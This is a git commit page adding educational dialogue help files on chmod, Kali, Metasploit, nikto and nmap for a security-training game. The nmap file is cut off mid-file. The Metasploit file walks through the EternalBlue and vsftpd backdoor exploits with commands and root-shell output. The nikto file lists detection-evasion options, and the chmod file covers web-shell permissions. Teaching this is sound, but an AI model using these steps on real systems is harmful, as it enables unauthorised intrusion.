cybersecurity/BreakEscape
1
0
Fork 0
mirror of https://github.com/cliffe/BreakEscape.git synced 2026-02-21 11:18:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: Add educational tool help files for security tools

Browse Source 
Create comprehensive Ink dialogue files for five security tools:
- Kali Linux: Overview and getting started guide
- nmap: Port scanning and network discovery
- Metasploit: Finding and running exploits
- chmod: File permissions and usage
- nikto: Web vulnerability scanning

Each file provides interactive educational content with:
- Multiple topic branches for different aspects
- Practical examples and use cases
- Step-by-step instructions
- Security and ethical usage reminders
- Navigation between related topics

These files can be included in game scenarios to provide
contextual help to players learning security tools.
This commit is contained in:
Claude
2025-11-18 10:50:00 +00:00
parent 04a85f36cf
commit ae78cdac47
5 changed files with 1449 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

333
story_design/ink/tool_help/chmod.ink Normal file
View File

@@ -0,0 +1,333 @@
// ===========================================
// TOOL HELP: CHMOD
// Break Escape Universe
// ===========================================
// Educational content about chmod and file permissions
// For use in training scenarios and missions
// ===========================================
=== chmod_help ===
Guide: chmod—"change mode"—is a fundamental Linux/Unix command for managing file permissions.
Guide: Understanding permissions is critical in security work. Misconfigured permissions are a common vulnerability, and you'll often need to modify permissions during operations.
+ [What are file permissions?]
-> chmod_permissions_basics
+ [How do I read permission notation?]
-> chmod_reading_permissions
+ [How do I use chmod?]
-> chmod_usage
+ [What are the numeric codes?]
-> chmod_numeric
+ [Show me common examples]
-> chmod_examples
+ [I understand now]
-> chmod_end
// ----------------
// Permissions basics
// ----------------
=== chmod_permissions_basics ===
Guide: Every file and directory in Linux has three types of permissions:
Guide: **Read (r)**: Permission to view file contents or list directory contents
**Write (w)**: Permission to modify file contents or create/delete files in a directory
**Execute (x)**: Permission to run a file as a program, or access a directory
Guide: These permissions are set for three categories of users:
Guide: **Owner (u)**: The user who owns the file
**Group (g)**: Users who are members of the file's group
**Others (o)**: Everyone else
Guide: Think of it as a security matrix: for each file, you define what the owner can do, what the group can do, and what everyone else can do.
Guide: When you run `ls -l`, you see permissions like this:
```
-rw-r--r-- 1 user group 1234 Jan 1 12:00 file.txt
```
Guide: That first part `-rw-r--r--` shows the permissions. Let's break it down:
- First character: File type (`-` for file, `d` for directory, `l` for symlink)
- Next three: Owner permissions (`rw-` = read and write, no execute)
- Next three: Group permissions (`r--` = read only)
- Last three: Others permissions (`r--` = read only)
* [How do I read this notation?]
-> chmod_reading_permissions
* [How do I change permissions?]
-> chmod_usage
* [What are the numeric codes?]
-> chmod_numeric
* [Show me examples]
-> chmod_examples
// ----------------
// Reading permissions
// ----------------
=== chmod_reading_permissions ===
Guide: Let's decode permission strings step by step.
Guide: **Example 1**: `-rwxr-xr-x`
- `-`: Regular file
- `rwx`: Owner can read, write, and execute
- `r-x`: Group can read and execute, but not write
- `r-x`: Others can read and execute, but not write
Guide: This might be an executable script that everyone can run, but only the owner can modify.
Guide: **Example 2**: `drwxrwx---`
- `d`: Directory
- `rwx`: Owner has full access (read, write, execute = can enter and modify directory)
- `rwx`: Group has full access
- `---`: Others have no access at all
Guide: This is a shared directory for a specific group, completely private from other users.
Guide: **Example 3**: `-rw-------`
- `-`: Regular file
- `rw-`: Owner can read and write
- `---`: Group has no access
- `---`: Others have no access
Guide: This is a private file, like you might use for sensitive data or SSH keys.
Guide: **Example 4**: `-rwsr-xr-x`
- Notice the `s` instead of `x` in owner permissions
- This is a special "setuid" bit
- When executed, the program runs with owner privileges, not the user's privileges
- This is powerful and potentially dangerous!
* [How do I change these permissions?]
-> chmod_usage
* [Explain the basics again]
-> chmod_permissions_basics
* [What are the numeric codes?]
-> chmod_numeric
* [Show me examples]
-> chmod_examples
// ----------------
// Using chmod
// ----------------
=== chmod_usage ===
Guide: chmod has two modes: symbolic and numeric. Let's cover both.
Guide: **SYMBOLIC MODE:**
Guide: Basic syntax: `chmod [who][operation][permissions] filename`
Guide: **Who:**
- `u` = user (owner)
- `g` = group
- `o` = others
- `a` = all (everyone)
Guide: **Operation:**
- `+` = add permission
- `-` = remove permission
- `=` = set exact permission
Guide: **Permissions:**
- `r` = read
- `w` = write
- `x` = execute
Guide: **Examples:**
- `chmod u+x script.sh` - Add execute permission for owner
- `chmod g-w file.txt` - Remove write permission for group
- `chmod o+r document.txt` - Add read permission for others
- `chmod a+x program` - Add execute permission for everyone
- `chmod u=rwx,g=rx,o=r file.txt` - Set exact permissions for each category
Guide: **Common patterns:**
- `chmod +x script.sh` - Make executable (shorthand for a+x)
- `chmod -w file.txt` - Make read-only
- `chmod u+x,go-rwx private_script.sh` - Executable only by owner
* [Tell me about numeric mode]
-> chmod_numeric
* [Show me practical examples]
-> chmod_examples
* [Explain permissions again]
-> chmod_permissions_basics
* [I understand now]
-> chmod_end
// ----------------
// Numeric mode
// ----------------
=== chmod_numeric ===
Guide: Numeric (octal) mode is faster once you learn it. Each permission has a value:
Guide: **Permission values:**
- `r` (read) = 4
- `w` (write) = 2
- `x` (execute) = 1
- No permission = 0
Guide: You add them up for each category:
- `rwx` = 4+2+1 = 7
- `rw-` = 4+2+0 = 6
- `r-x` = 4+0+1 = 5
- `r--` = 4+0+0 = 4
- `---` = 0+0+0 = 0
Guide: Then you provide three digits: owner, group, others.
Guide: **Common permission codes:**
Guide: **755** (`rwxr-xr-x`):
Owner has full control, everyone can read and execute
Common for executable scripts and programs
Guide: **644** (`rw-r--r--`):
Owner can modify, everyone can read
Common for regular files and documents
Guide: **600** (`rw-------`):
Only owner can read and write, no one else has access
Common for private files, SSH keys, credentials
Guide: **700** (`rwx------`):
Only owner has full control, no one else can access
Common for private directories
Guide: **666** (`rw-rw-rw-`):
Everyone can read and write (generally not recommended!)
Potentially insecure
Guide: **777** (`rwxrwxrwx`):
Full permissions for everyone (dangerous!)
Almost never a good idea in production
Guide: **Usage:**
- `chmod 755 script.sh`
- `chmod 600 id_rsa`
- `chmod 644 config.txt`
* [Show me practical examples]
-> chmod_examples
* [Explain symbolic mode]
-> chmod_usage
* [What do permissions mean?]
-> chmod_permissions_basics
* [I'm ready to use chmod]
-> chmod_end
// ----------------
// Examples
// ----------------
=== chmod_examples ===
Guide: Let's walk through real-world scenarios:
Guide: **Scenario 1: Making a script executable**
You download a Python script and want to run it:
```
$ ls -l script.py
-rw-r--r-- 1 user group 1234 Jan 1 12:00 script.py
$ chmod +x script.py
$ ls -l script.py
-rwxr-xr-x 1 user group 1234 Jan 1 12:00 script.py
$ ./script.py
(script runs)
```
Guide: **Scenario 2: Securing SSH private key**
SSH will refuse to use a private key with loose permissions:
```
$ chmod 600 ~/.ssh/id_rsa
```
Now only you can read or write your private key. Required for security.
Guide: **Scenario 3: Creating a shared group directory**
Team members need to collaborate:
```
$ mkdir shared_project
$ chmod 770 shared_project
$ chgrp developers shared_project
```
Now all members of the "developers" group can fully access it, but others cannot.
Guide: **Scenario 4: Making a file read-only**
You have a configuration you don't want accidentally modified:
```
$ chmod 444 important_config.conf
```
Now no one can write to it (you'd need to chmod again to modify it).
Guide: **Scenario 5: After uploading a web shell (penetration testing)**
You've uploaded exploit.php to a web server:
```
$ chmod 755 exploit.php
```
Now the web server can execute it (as can you), but it's not writable by others.
Guide: **Scenario 6: Recursive permissions for a directory**
Set permissions for a directory and everything inside:
```
$ chmod -R 755 /var/www/website/
```
The `-R` flag applies recursively to all files and subdirectories.
* [Explain numeric codes again]
-> chmod_numeric
* [Tell me about symbolic mode]
-> chmod_usage
* [What are permissions?]
-> chmod_permissions_basics
* [I'm ready to practice]
-> chmod_end
// ----------------
// End
// ----------------
=== chmod_end ===
Guide: Understanding chmod is essential for Linux security work. You'll use it constantly for:
- Securing sensitive files
- Making scripts executable
- Fixing permission vulnerabilities
- Post-exploitation activities
Guide: Key principles:
- **Principle of least privilege**: Grant only the permissions needed
- **Protect private keys**: Always use 600 or 400 for SSH keys
- **Be cautious with 777**: World-writable permissions are usually dangerous
- **Check before you change**: Use `ls -l` to see current permissions first
Guide: Practice in a safe environment until chmod becomes second nature.
-> END

127
story_design/ink/tool_help/kali_linux.ink Normal file
View File

@@ -0,0 +1,127 @@
// ===========================================
// TOOL HELP: KALI LINUX
// Break Escape Universe
// ===========================================
// Educational content about Kali Linux
// For use in training scenarios and missions
// ===========================================
=== kali_linux_help ===
Guide: Kali Linux is a specialized Debian-based Linux distribution designed for penetration testing and security auditing.
Guide: Think of it as a Swiss Army knife for security professionals—it comes pre-loaded with hundreds of security tools, all configured and ready to use.
+ [What makes Kali special?]
-> kali_special
+ [What tools does it include?]
-> kali_tools
+ [How do I get started with Kali?]
-> kali_getting_started
+ [I understand now]
-> kali_end
// ----------------
// What makes Kali special
// ----------------
=== kali_special ===
Guide: Several things set Kali apart from regular Linux distributions:
Guide: First, it's purpose-built. Every tool, every default setting, every package is chosen for security testing. You don't need to spend days installing and configuring tools.
Guide: Second, it's actively maintained by Offensive Security, the company behind the OSCP certification. They keep the tools updated and ensure everything works together.
Guide: Third, it's flexible. You can run it from a USB drive without installing anything, run it in a virtual machine, or install it as your main operating system.
Guide: Fourth, it's documented extensively. Almost every tool has built-in help, and the Kali documentation is comprehensive.
* [Tell me about the tools available]
-> kali_tools
* [How do I start using it?]
-> kali_getting_started
* [I'm ready to move on]
-> kali_end
// ----------------
// Tools included
// ----------------
=== kali_tools ===
Guide: Kali includes over 600 penetration testing tools, organized by category:
Guide: **Information Gathering**: Tools like nmap, Recon-ng, and theHarvester for reconnaissance and mapping networks.
Guide: **Vulnerability Analysis**: Scanners like nikto, OpenVAS, and sqlmap that identify weaknesses in systems.
Guide: **Exploitation**: Metasploit Framework, exploit-db, and other tools for testing discovered vulnerabilities.
Guide: **Password Attacks**: John the Ripper, Hashcat, and Hydra for password testing and recovery.
Guide: **Wireless Attacks**: Aircrack-ng suite for testing wireless network security.
Guide: **Forensics**: Tools for investigating compromised systems and analyzing evidence.
Guide: The beauty is that these tools work together. You might use nmap to find open ports, nikto to scan a web server, and Metasploit to test a vulnerability.
* [How do I get started with Kali?]
-> kali_getting_started
* [Tell me more about what makes it special]
-> kali_special
* [That's helpful, thanks]
-> kali_end
// ----------------
// Getting started
// ----------------
=== kali_getting_started ===
Guide: Getting started with Kali is straightforward:
Guide: **Option 1: Virtual Machine** (Recommended for beginners)
Download a Kali VM image from kali.org and run it in VirtualBox or VMware. Safe, isolated, and easy to snapshot if something breaks.
Guide: **Option 2: Live Boot**
Create a bootable USB drive with Kali. You can boot any computer into Kali without installing anything. Great for portability.
Guide: **Option 3: Full Installation**
Install Kali as your main operating system. Most flexible, but requires dedicating a machine to it.
Guide: Once you're in Kali, start with the basics:
- Update your system: `sudo apt update && sudo apt upgrade`
- Explore the Applications menu to see available tools
- Read the documentation at docs.kali.org
- Start with simple tools like nmap before moving to complex frameworks
Guide: Remember: Kali is powerful. Only use it on systems you own or have explicit permission to test. Unauthorized access is illegal.
* [Tell me about specific tools]
-> kali_tools
* [What makes Kali different from other Linux?]
-> kali_special
* [I'm ready to start practicing]
-> kali_end
// ----------------
// End
// ----------------
=== kali_end ===
Guide: Good luck with Kali. Remember: these tools are powerful. Use them responsibly, ethically, and only with proper authorization.
Guide: The security community values ethical behavior. Keep it legal, keep it authorized, and keep learning.
-> END

366
story_design/ink/tool_help/metasploit.ink Normal file
View File

@@ -0,0 +1,366 @@
// ===========================================
// TOOL HELP: METASPLOIT FRAMEWORK
// Break Escape Universe
// ===========================================
// Educational content about Metasploit
// For use in training scenarios and missions
// ===========================================
=== metasploit_help ===
Guide: The Metasploit Framework is the world's most used penetration testing framework.
Guide: Think of it as a massive, organized library of exploits, payloads, and security tools. It automates much of the complex work involved in exploiting vulnerabilities.
Guide: It's maintained by Rapid7 and used by both penetration testers and security researchers worldwide.
+ [How do I start Metasploit?]
-> metasploit_starting
+ [How do I find an exploit?]
-> metasploit_finding_exploits
+ [How do I run an exploit?]
-> metasploit_running_exploits
+ [What's the workflow?]
-> metasploit_workflow
+ [Show me a complete example]
-> metasploit_example
+ [I understand now]
-> metasploit_end
// ----------------
// Starting Metasploit
// ----------------
=== metasploit_starting ===
Guide: To start Metasploit, you use the Metasploit Console—`msfconsole`:
Guide: Simply type:
`msfconsole`
Guide: You'll see ASCII art (different each time) and then the msf6 prompt:
`msf6 >`
Guide: This is your command center. From here, you can search for exploits, configure them, run them, and manage sessions.
Guide: **Basic commands to know:**
- `help` - Shows available commands
- `search [term]` - Search for exploits, payloads, or modules
- `use [module]` - Select a module to configure
- `show options` - Display configuration options for current module
- `set [option] [value]` - Configure a module parameter
- `run` or `exploit` - Execute the module
- `back` - Return to main menu
- `exit` - Quit msfconsole
* [How do I find exploits?]
-> metasploit_finding_exploits
* [How do I run an exploit?]
-> metasploit_running_exploits
* [Show me the workflow]
-> metasploit_workflow
* [I'm ready to practice]
-> metasploit_end
// ----------------
// Finding exploits
// ----------------
=== metasploit_finding_exploits ===
Guide: Finding the right exploit is crucial. Metasploit makes this easier with its search functionality.
Guide: **Search by service:**
`search apache`
Finds all modules related to Apache
Guide: **Search by CVE number:**
`search cve:2017-0144`
Finds exploits for a specific vulnerability (in this case, EternalBlue)
Guide: **Search by platform:**
`search platform:windows`
Finds Windows-specific modules
Guide: **Search by type:**
`search type:exploit`
`search type:auxiliary`
`search type:payload`
Guide: **Combined search:**
`search apache type:exploit platform:linux`
Guide: **Understanding search results:**
```
Name Rank Description
---- ---- -----------
exploit/unix/webapp/apache_mod_cgi_bash_env_exec excellent Apache mod_cgi Bash Environment Variable Injection
```
Guide: - **Name**: The module path you'll use with `use`
- **Rank**: Reliability rating (excellent, great, good, normal, average, low, manual)
- **Description**: What the exploit does
Guide: **Rank meanings:**
- **Excellent**: Exploit never crashes, always works
- **Great**: Common, reliable exploit
- **Good**: Usually reliable
- **Normal**: Works in common scenarios
- **Low**: May crash target or only work in specific conditions
* [How do I use an exploit once I find it?]
-> metasploit_running_exploits
* [Show me the complete workflow]
-> metasploit_workflow
* [Show me a full example]
-> metasploit_example
* [How do I start Metasploit again?]
-> metasploit_starting
// ----------------
// Running exploits
// ----------------
=== metasploit_running_exploits ===
Guide: Once you've found an exploit, here's how to run it:
Guide: **Step 1: Select the exploit**
`use exploit/windows/smb/ms17_010_eternalblue`
Guide: Your prompt changes to show you're in that module:
`msf6 exploit(windows/smb/ms17_010_eternalblue) >`
Guide: **Step 2: View required options**
`show options`
Guide: This displays all configurable parameters:
```
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes Target address
RPORT 445 yes Target port
```
Guide: **Step 3: Configure the exploit**
`set RHOSTS 192.168.1.50`
Guide: RHOSTS is the target (Remote HOST). Some exploits also need:
- `RPORT` - Target port (usually has a default)
- `LHOST` - Your IP address (Local HOST) for callback connections
- `LPORT` - Your listening port
Guide: **Step 4: Select a payload**
`show payloads`
Guide: This shows compatible payloads. A payload is what runs after exploitation succeeds. Common choices:
- `windows/meterpreter/reverse_tcp` - Opens a powerful shell back to you
- `cmd/unix/reverse_bash` - Simple shell
- `windows/x64/meterpreter/reverse_https` - Encrypted shell
Guide: Set your payload:
`set payload windows/x64/meterpreter/reverse_tcp`
Guide: **Step 5: Configure payload options**
`set LHOST 192.168.1.100` (your IP address)
Guide: **Step 6: Run the exploit**
`exploit` or `run`
Guide: If successful, you'll get a Meterpreter session or shell!
* [Show me a complete example]
-> metasploit_example
* [Explain the workflow again]
-> metasploit_workflow
* [How do I find exploits?]
-> metasploit_finding_exploits
* [I'm ready to practice]
-> metasploit_end
// ----------------
// Workflow overview
// ----------------
=== metasploit_workflow ===
Guide: Here's the typical Metasploit workflow:
Guide: **1. Reconnaissance**
Use nmap or other tools to identify targets, open ports, and service versions.
Example: `nmap -sV 192.168.1.50` reveals FTP on port 21, version vsftpd 2.3.4
Guide: **2. Search for exploit**
`search vsftpd`
Finds: `exploit/unix/ftp/vsftpd_234_backdoor`
Guide: **3. Select exploit**
`use exploit/unix/ftp/vsftpd_234_backdoor`
Guide: **4. Configure target**
```
set RHOSTS 192.168.1.50
show options
```
Guide: **5. Select payload** (if needed)
```
show payloads
set payload cmd/unix/interact
```
Guide: **6. Verify configuration**
`show options`
Make sure all Required options are set
Guide: **7. Run exploit**
`exploit`
Guide: **8. Interact with session**
If successful, you now have access to the target system. Use appropriate post-exploitation modules or manual commands.
Guide: **9. Clean up**
Professional testing includes removing traces and documenting findings.
* [Show me a complete example]
-> metasploit_example
* [How do I find exploits again?]
-> metasploit_finding_exploits
* [How do I run exploits?]
-> metasploit_running_exploits
* [I'm ready to practice]
-> metasploit_end
// ----------------
// Complete example
// ----------------
=== metasploit_example ===
Guide: Let's walk through a complete example: exploiting a vulnerable FTP service.
Guide: **Scenario**: nmap revealed a target at 192.168.1.50 running vsftpd 2.3.4 on port 21.
Guide: **Step-by-step:**
Guide: 1. Start Metasploit:
```
$ msfconsole
msf6 >
```
Guide: 2. Search for vsftpd exploits:
```
msf6 > search vsftpd
Matching Modules
================
Name Rank Description
---- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor excellent VSFTPD v2.3.4 Backdoor Command Execution
```
Guide: 3. Select the exploit:
```
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
```
Guide: 4. View options:
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes Target address
RPORT 21 yes Target port
```
Guide: 5. Configure target:
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
```
Guide: 6. Check the payload (this exploit has an automatic payload):
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
(No additional configuration needed for this exploit)
```
Guide: 7. Run the exploit:
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.50:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.50:21 - USER: 331 Please specify the password.
[+] 192.168.1.50:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.50:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
```
Guide: 8. You now have a shell! Interact with it:
```
id
uid=0(root) gid=0(root)
whoami
root
```
Guide: Success! You've exploited the target and have root access.
* [Explain the workflow again]
-> metasploit_workflow
* [How do I find other exploits?]
-> metasploit_finding_exploits
* [How do I run exploits?]
-> metasploit_running_exploits
* [I'm ready to practice]
-> metasploit_end
// ----------------
// End
// ----------------
=== metasploit_end ===
Guide: Critical reminder: Metasploit is an extremely powerful tool capable of compromising systems.
Guide: **Only use it:**
- On systems you own
- On systems where you have explicit written authorization to test
- In lab environments designed for practice
- In authorized CTF competitions
Guide: Unauthorized use of Metasploit against systems you don't own is illegal and can result in criminal prosecution.
Guide: With great power comes great responsibility. Use Metasploit ethically, professionally, and always with authorization.
-> END

416
story_design/ink/tool_help/nikto.ink Normal file
View File

@@ -0,0 +1,416 @@
// ===========================================
// TOOL HELP: NIKTO
// Break Escape Universe
// ===========================================
// Educational content about nikto web scanner
// For use in training scenarios and missions
// ===========================================
=== nikto_help ===
Guide: Nikto is an open-source web server scanner that performs comprehensive tests against web servers.
Guide: Think of it as a specialized security audit tool for web applications. It checks for thousands of potentially dangerous files, outdated software, configuration issues, and known vulnerabilities.
Guide: It's been around since 2001 and is a staple in every penetration tester's toolkit.
+ [What does nikto do?]
-> nikto_functionality
+ [How do I run a basic scan?]
-> nikto_basic_scan
+ [What options are available?]
-> nikto_options
+ [Show me practical examples]
-> nikto_examples
+ [How do I read the output?]
-> nikto_output
+ [I understand now]
-> nikto_end
// ----------------
// Functionality
// ----------------
=== nikto_functionality ===
Guide: Nikto performs comprehensive web server security checks:
Guide: **What it detects:**
- Outdated server software versions with known vulnerabilities
- Dangerous files and programs (admin interfaces, backup files, test scripts)
- Configuration issues (directory indexing, default files)
- Insecure headers and cookies
- Over 6,700 potentially dangerous files/CGIs
- Outdated components (plugins, frameworks)
- Common vulnerabilities (XSS potential, SQL injection entry points)
Guide: **How it works:**
Nikto sends thousands of HTTP requests to the target, analyzing responses for security issues. It checks:
- Server headers and banners
- File and directory existence
- Common misconfigurations
- Known vulnerability patterns
Guide: **Strengths:**
- Fast and automated
- Comprehensive vulnerability database
- Regularly updated
- Finds issues human reviewers might miss
- Good for initial reconnaissance
Guide: **Limitations:**
- Very noisy—generates tons of log entries
- Can trigger IDS/IPS alerts
- Doesn't test authentication-protected areas
- Only tests for known issues, not zero-days
- Can produce false positives
* [How do I run nikto?]
-> nikto_basic_scan
* [What options does it have?]
-> nikto_options
* [Show me examples]
-> nikto_examples
* [I'm ready to practice]
-> nikto_end
// ----------------
// Basic scanning
// ----------------
=== nikto_basic_scan ===
Guide: The basic nikto syntax is simple:
Guide: **Most basic scan:**
```
nikto -h http://target.com
```
Guide: The `-h` flag specifies the host (target). Nikto will:
1. Identify the web server
2. Check for server vulnerabilities
3. Test for dangerous files
4. Look for configuration issues
5. Generate a detailed report
Guide: **Common variations:**
Guide: **Scan HTTPS:**
```
nikto -h https://target.com
```
Tests SSL/TLS configuration and certificate issues
Guide: **Scan specific port:**
```
nikto -h http://target.com -p 8080
```
Many applications run on non-standard ports
Guide: **Scan with custom port and SSL:**
```
nikto -h https://target.com:8443
```
Guide: **Scan multiple ports:**
```
nikto -h target.com -p 80,443,8080,8443
```
Checks all specified ports
Guide: **Basic authentication:**
```
nikto -h http://target.com -id username:password
```
For sites requiring HTTP basic auth
* [What other options are available?]
-> nikto_options
* [Show me practical examples]
-> nikto_examples
* [How do I read the results?]
-> nikto_output
* [What does nikto check for?]
-> nikto_functionality
// ----------------
// Options
// ----------------
=== nikto_options ===
Guide: Nikto offers many options to customize your scans:
Guide: **Tuning options** (`-Tuning`)
Controls which tests to run:
```
nikto -h target.com -Tuning 1
```
- 1: Interesting files
- 2: Misconfiguration
- 3: Information disclosure
- 4: Injection (XSS/script/HTML)
- 5: Remote file retrieval
- 6: Denial of service
- 7: Remote file retrieval (server-wide)
- 8: Command execution / remote shell
- 9: SQL injection
- 0: File upload
- a: Authentication bypass
- b: Software identification
- c: Remote source inclusion
- x: Reverse tuning (scan everything except specified)
Guide: **Output options:**
```
nikto -h target.com -o results.html -Format html
```
Saves results in various formats: txt, xml, html, csv, json
Guide: **Speed control:**
```
nikto -h target.com -Display V -Pause 2
```
- `-Display V`: Verbose output
- `-Pause N`: Pause N seconds between requests (reduces detection)
Guide: **SSL options:**
```
nikto -h https://target.com -ssl -nossl
```
- `-ssl`: Force SSL mode
- `-nossl`: Disable SSL
Guide: **User agent:**
```
nikto -h target.com -useragent "Mozilla/5.0..."
```
Custom user agent string to avoid detection
Guide: **Evasion techniques:**
```
nikto -h target.com -evasion 1
```
- 1: Random URI encoding
- 2: Directory self-reference (/./)
- 3: Premature URL ending
- 4: Prepend long random string
- 5: Fake parameter
- 6: TAB as request spacer
- 7: Change case in URL
- 8: Use Windows directory separator
Guide: **Mutate options:**
```
nikto -h target.com -mutate 1
```
- 1: Test all files with all root directories
- 2: Guess for password file names
- 3: Enumerate user names via Apache (/~user type requests)
- 4: Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
- 5: Attempt to brute force sub-domain names
- 6: Attempt to guess directory names from dictionary file
* [Show me practical examples]
-> nikto_examples
* [How do I run a basic scan?]
-> nikto_basic_scan
* [How do I read the output?]
-> nikto_output
* [What does nikto do?]
-> nikto_functionality
// ----------------
// Examples
// ----------------
=== nikto_examples ===
Guide: Let's walk through real-world scanning scenarios:
Guide: **Scenario 1: Initial web server assessment**
```
nikto -h http://192.168.1.50
```
Standard scan. Quick overview of vulnerabilities and misconfigurations.
Guide: **Scenario 2: Thorough HTTPS scan with output**
```
nikto -h https://target.com -o scan_results.html -Format html
```
Scans HTTPS site, saves detailed HTML report for later review.
Guide: **Scenario 3: Stealthy scan**
```
nikto -h target.com -Pause 5 -evasion 1 -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
```
Slower scan with evasion, pauses between requests, uses realistic user agent to avoid detection.
Guide: **Scenario 4: Focus on specific vulnerabilities**
```
nikto -h target.com -Tuning 9
```
Only tests for SQL injection vulnerabilities. Faster, more focused scan.
Guide: **Scenario 5: Multiple targets**
Create a file `targets.txt`:
```
http://target1.com
http://target2.com
https://target3.com:8443
```
Then scan:
```
nikto -h targets.txt -o results.html -Format html
```
Guide: **Scenario 6: Authenticated scan**
```
nikto -h http://intranet.company.com -id admin:password123
```
Scans internal site requiring HTTP basic authentication.
Guide: **Scenario 7: Complete scan with all options**
```
nikto -h https://target.com -ssl -p 443,8443 -Tuning 123456789ab -o detailed_scan.html -Format html -Display V
```
Comprehensive scan: multiple ports, all test types, detailed output, verbose display.
* [How do I read these results?]
-> nikto_output
* [Tell me about options again]
-> nikto_options
* [How do I do a basic scan?]
-> nikto_basic_scan
* [What does nikto check for?]
-> nikto_functionality
// ----------------
// Reading output
// ----------------
=== nikto_output ===
Guide: Understanding nikto output is crucial. Let's break down a typical scan:
Guide: **Header information:**
```
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.50
+ Target Hostname: target.com
+ Target Port: 80
+ Start Time: 2024-01-15 10:30:00
---------------------------------------------------------------------------
```
Basic scan parameters
Guide: **Server identification:**
```
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined.
+ The X-Content-Type-Options header is not set.
```
These are configuration issues—not critical but worth noting.
Guide: **Vulnerability findings:**
```
+ OSVDB-3268: /config/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
```
Each line shows:
- OSVDB number (vulnerability database reference)
- Path found
- Description of the issue
Guide: **Critical findings look like:**
```
+ OSVDB-877: HTTP TRACE method is active, suggesting vulnerability to XST
+ /admin/login.php: Admin login page found
+ /backup.sql: Database backup file found (possible data exposure)
+ /test.php: PHP test file found (possible info disclosure)
```
Guide: **Severity assessment:**
- **Critical**: Exposed admin panels, backup files, database files, shell access
- **High**: Vulnerable software versions, dangerous files, command execution
- **Medium**: Information disclosure, configuration issues, outdated components
- **Low**: Missing security headers, directory indexing, default files
Guide: **End summary:**
```
+ 26522 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-01-15 10:45:32 (932 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Guide: **What to prioritize:**
1. Exposed admin interfaces
2. Backup or database files accessible
3. Vulnerable software versions (check exploit databases)
4. File upload capabilities
5. Information disclosure issues
6. Configuration weaknesses
* [Show me scan examples again]
-> nikto_examples
* [Tell me about scan options]
-> nikto_options
* [How do I run a basic scan?]
-> nikto_basic_scan
* [I'm ready to use nikto]
-> nikto_end
// ----------------
// End
// ----------------
=== nikto_end ===
Guide: Important considerations for using nikto:
Guide: **Ethical usage:**
- Only scan systems you own or have written authorization to test
- Nikto is extremely noisy—it WILL be logged and detected
- Unauthorized scanning is illegal and can result in criminal charges
Guide: **Operational considerations:**
- Nikto is loud—not for stealth operations
- Can trigger IDS/IPS alerts
- May impact server performance (thousands of requests)
- Use during authorized testing windows
Guide: **Best practices:**
- Run nikto as part of a comprehensive assessment, not alone
- Verify findings manually—false positives occur
- Document all findings for your report
- Follow up critical findings with deeper testing
- Keep nikto updated (`nikto -update`)
Guide: Use nikto responsibly, professionally, and only with proper authorization.
-> END

207
story_design/ink/tool_help/nmap.ink Normal file
View File

@@ -0,0 +1,207 @@
// ===========================================
// TOOL HELP: NMAP
// Break Escape Universe
// ===========================================
// Educational content about nmap and port scanning
// For use in training scenarios and missions
// ===========================================
=== nmap_help ===
Guide: nmap—Network Mapper—is the industry standard for network discovery and security auditing.
Guide: Think of it as a sophisticated radar for networks. It tells you what hosts are alive, what services they're running, and even what operating systems they use.
Guide: For a penetration tester, nmap is typically the first tool you reach for. You need to know what's out there before you can assess it.
+ [How do I scan for open ports?]
-> nmap_basic_scan
+ [What are ports anyway?]
-> nmap_ports_explained
+ [What scanning options does nmap have?]
-> nmap_scan_types
+ [Show me practical examples]
-> nmap_examples
+ [I understand now]
-> nmap_end
// ----------------
// Ports explained
// ----------------
=== nmap_ports_explained ===
Guide: Good question. Let's establish the basics first.
Guide: Imagine a computer as a large building. The IP address is the street address, but the building has many doors—each numbered. Those doors are **ports**.
Guide: Each port can host a different service:
- Port 22: SSH (secure remote access)
- Port 80: HTTP (websites)
- Port 443: HTTPS (secure websites)
- Port 3389: RDP (Windows remote desktop)
- Port 3306: MySQL (database)
Guide: There are 65,535 possible ports (numbered 0-65535). Services can run on any port, but they typically use standard "well-known ports" for convenience.
Guide: When you scan for open ports, you're knocking on each door to see if someone answers. An "open" port means a service is listening and will respond. A "closed" port refuses connection. A "filtered" port is blocked by a firewall.
* [How do I scan these ports with nmap?]
-> nmap_basic_scan
* [What scan types are available?]
-> nmap_scan_types
* [Show me examples]
-> nmap_examples
// ----------------
// Basic scanning
// ----------------
=== nmap_basic_scan ===
Guide: The basic syntax is simple: `nmap [target]`
Guide: For example:
`nmap 192.168.1.1`
Guide: This performs a default scan of the 1,000 most common ports on that IP address. It's quick but not comprehensive.
Guide: **Common useful flags:**
Guide: `-p` specifies ports:
- `nmap -p 80,443 192.168.1.1` (scan specific ports)
- `nmap -p 1-65535 192.168.1.1` (scan all ports)
- `nmap -p- 192.168.1.1` (shorthand for all ports)
Guide: `-sV` detects service versions:
`nmap -sV 192.168.1.1` tells you not just that port 80 is open, but that it's running Apache 2.4.41
Guide: `-O` attempts OS detection:
`nmap -O 192.168.1.1` tries to identify what operating system the target is running
Guide: `-A` enables aggressive scanning (OS detection, version detection, script scanning):
